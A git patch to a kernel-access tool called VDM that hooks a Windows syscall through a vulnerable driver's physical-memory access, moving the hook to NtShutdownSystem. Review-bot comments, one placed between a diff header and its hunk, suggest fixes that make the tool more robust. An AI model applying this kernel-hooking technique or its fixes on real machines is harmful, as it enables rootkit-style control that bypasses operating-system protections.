From dcfadd1359187ce0a1425dbf761237d04286e549 Mon Sep 17 00:00:00 2001
From: xerox
Date: Thu, 5 Nov 2020 20:28:22 -0800
Subject: [PATCH] switched back to use NtShutdownSystem
---
 README.md | 13 +++++++------
 VDM/main.cpp | 1 +
 VDM/vdm_ctx/vdm_ctx.cpp | 12 +++++++-----
 VDM/vdm_ctx/vdm_ctx.h | 4 ++--
 4 files changed, 17 insertions(+), 13 deletions(-)
diff --git a/README.md b/README.md
index 9b75480..4775ed0 100644
--- a/README.md
+++ b/README.md
@@ -15,7 +15,7 @@ whereas this project is. This project can be used more broadly then physmeme.
 # Example
-In this example VDM syscalls into an inline hook placed on `dxgkrnl.NtGdiDdDDICreateContext` to call memcpy exported from ntoskrnl.exe.
+In this example VDM syscalls into an inline hook placed on `ntoskrnl.NtShutdownSystem` to call memcpy exported from ntoskrnl.exe.
 #### Demo Code
 ```cpp
@@ -44,10 +44,11 @@ std::printf("[+] kernel MZ -> 0x%x\n", mz_bytes);
 #### Demo Code Result
 ```
-[+] drv_handle -> 0xb0, drv_key -> frAQBc8Wsa1xVPfv
-[+] NtGdiDdDDICreateContext physical address -> 0x0000000100ACA5F0
-[+] ntoskrnl base address -> 0xFFFFF80075200000
-[+] ntoskrnl memcpy address -> 0xFFFFF800755F0980
+[+] drv_handle -> 0x100, drv_key -> frAQBc8Wsa1xVPfv
+[+] NtShutdownSystem physical address -> 0x0000000002D0B1A0
+[+] NtShutdownSystem page offset -> 0x1a0
+[+] ntoskrnl base address -> 0xFFFFF80456400000
+[+] ntoskrnl memcpy address -> 0xFFFFF804565D5A80
 [+] kernel MZ -> 0x5a4d
 [+] press any key to close...
 ```
@@ -59,7 +60,7 @@ hook by changing this variable inside of `vdm_ctx/vdm_ctx.h`.
 ```cpp
 // change this to whatever you want :^)
-constexpr std::pair syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" };
+constexpr std::pair syscall_hook = { "NtShutdownSystem`", "ntdll.dll" };
 ```
 ### vdm::load_drv
diff --git a/VDM/main.cpp b/VDM/main.cpp
index fe6427d..058e2be 100644
--- a/VDM/main.cpp
+++ b/VDM/main.cpp
@@ -19,6 +19,7 @@ int __cdecl main(int argc, char** argv)
 std::printf("[+] drv_handle -> 0x%x, drv_key -> %s\n", drv_handle, drv_key.c_str());
 std::printf("[+] %s physical address -> 0x%p\n", vdm::syscall_hook.first, vdm::syscall_address.load());
+ std::printf("[+] %s page offset -> 0x%x\n", vdm::syscall_hook.first, vdm::nt_page_offset);
 std::printf("[+] ntoskrnl base address -> 0x%p\n", ntoskrnl_base);
 std::printf("[+] ntoskrnl memcpy address -> 0x%p\n", ntoskrnl_memcpy);
diff --git a/VDM/vdm_ctx/vdm_ctx.cpp b/VDM/vdm_ctx/vdm_ctx.cpp
index 8b16ab4..7499fb4 100644
--- a/VDM/vdm_ctx/vdm_ctx.cpp
+++ b/VDM/vdm_ctx/vdm_ctx.cpp
@@ -4,14 +4,13 @@ namespace vdm
 {
 vdm_ctx::vdm_ctx()
 {
- LoadLibraryA("user32.dll"); // required for win32u.dll...
- vdm::dxgkrnl_buffer = reinterpret_cast(
- LoadLibraryEx("drivers\\dxgkrnl.sys", NULL,
+ vdm::ntoskrnl = reinterpret_cast(
+ LoadLibraryExA("ntoskrnl.exe", NULL,
 DONT_RESOLVE_DLL_REFERENCES));
 nt_rva = reinterpret_cast(
 util::get_kernel_export(
- "dxgkrnl.sys",
+ "ntoskrnl.exe",
 syscall_hook.first,
 true
 ));
@@ -47,11 +46,14 @@ namespace vdm
 break;
 if (!vdm::read_phys(reinterpret_cast(address + page), page_data, PAGE_4KB))
+ {
+ std::printf("[+] failed to read phys...\n");
 continue;
+ }
 // check the first 32 bytes of the syscall, if its the same, test that its the correct
 // occurrence of these bytes (since dxgkrnl is loaded into physical memory at least 2 times now)...
- if (!memcmp(page_data + nt_page_offset, dxgkrnl_buffer + nt_rva, 32))
+ if (!memcmp(page_data + nt_page_offset, ntoskrnl + nt_rva, 32))
 if (valid_syscall(reinterpret_cast(address + page + nt_page_offset)))
 syscall_address.store(
 reinterpret_cast(
diff --git a/VDM/vdm_ctx/vdm_ctx.h b/VDM/vdm_ctx/vdm_ctx.h
index 9ff67e3..6401048 100644
--- a/VDM/vdm_ctx/vdm_ctx.h
+++ b/VDM/vdm_ctx/vdm_ctx.h
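Review bot: The added `std::printf` passes `vdm::nt_page_offset`, declared `std::uint16_t` in vdm_ctx.h, to a `%x` conversion; after default promotion the argument is an `int` while `%x` expects `unsigned int`, which is a formally mismatched conversion even though it prints the expected value in practice. `%hx` (or a cast to `unsigned`) makes the pair exact: `std::printf("[+] %s page offset -> 0x%hx\n", vdm::syscall_hook.first, vdm::nt_page_offset);`. The enclosing `main` starts and ends outside the hunk.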
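Review bot: The `LoadLibraryExA("ntoskrnl.exe", ...)` result is stored in `vdm::ntoskrnl` without a null check, and the scan loop later reads `ntoskrnl + nt_rva` in `memcmp`, so a failed load becomes a read from a small invalid address instead of a reported error. Since a constructor cannot return a status, a `std::printf` plus early return (or a flag the caller checks) before `nt_rva` is computed would make the failure visible, and the `util::get_kernel_export` result deserves the same zero check because it is used as an offset. A bare module name is also resolved through the DLL search order rather than pinned to the system directory, so the bytes compared against physical memory could come from a copy of `ntoskrnl.exe` other than the installed kernel; building the path from `GetSystemDirectoryA` would remove that ambiguity. The constructor body continues outside the hunk.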
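Review bot: The comment above the changed `memcmp` still explains the extra `valid_syscall` test in terms of dxgkrnl ("since dxgkrnl is loaded into physical memory at least 2 times now"), but the new condition compares against `ntoskrnl + nt_rva`, so the comment now describes a module the code no longer uses; something like `// the page's bytes match the ntoskrnl export; valid_syscall checks this is the correct occurrence` keeps it accurate. The new failure message also uses the `[+]` prefix that the rest of the output reserves for successes, and it is emitted for every unreadable page inside the scan loop, so a run with many unreadable pages floods stdout; a distinct prefix such as `[!]` and printing once (or counting failures and reporting after the loop) would keep the log readable. The scan loop containing this hunk starts and ends outside it.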
@@ -11,14 +11,14 @@ namespace vdm
 {
 // change this to whatever you want :^)
- constexpr std::pair syscall_hook = { "NtGdiDdDDICreateContext", "win32u.dll" };
+ constexpr std::pair syscall_hook = { "NtShutdownSystem", "ntdll.dll" };
 inline std::atomic is_page_found = false;
 inline std::atomic syscall_address = nullptr;
 inline std::uint16_t nt_page_offset;
 inline std::uint32_t nt_rva;
- inline std::uint8_t* dxgkrnl_buffer;
+ inline std::uint8_t* ntoskrnl;
 class vdm_ctx
 {
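Review bot: `syscall_hook` is the one knob the README tells users to change, yet the comment `// change this to whatever you want :^)` does not say what the two strings mean; vdm_ctx.cpp passes `syscall_hook.first` to `util::get_kernel_export("ntoskrnl.exe", ...)`, and the removed `LoadLibraryA("user32.dll"); // required for win32u.dll...` line suggests the second element is the user-mode module exporting the matching syscall stub, but that second part is inferred. A comment such as `// { ntoskrnl export whose bytes are searched for in physical memory, user-mode module that exports its syscall stub }` would let a reader pick a valid pair without reading the .cpp. The README snippet updated in this same commit shows the value as `"NtShutdownSystem`"` with a stray backtick, which does not match this header line. The renamed `inline std::uint8_t* ntoskrnl;` is zero-initialised as a namespace-scope variable and is only valid after `vdm_ctx::vdm_ctx` has assigned it, so a short `// set by vdm_ctx::vdm_ctx; ntoskrnl.exe image loaded with DONT_RESOLVE_DLL_REFERENCES` comment would document that ordering for the memcmp in vdm_ctx.cpp that reads through it.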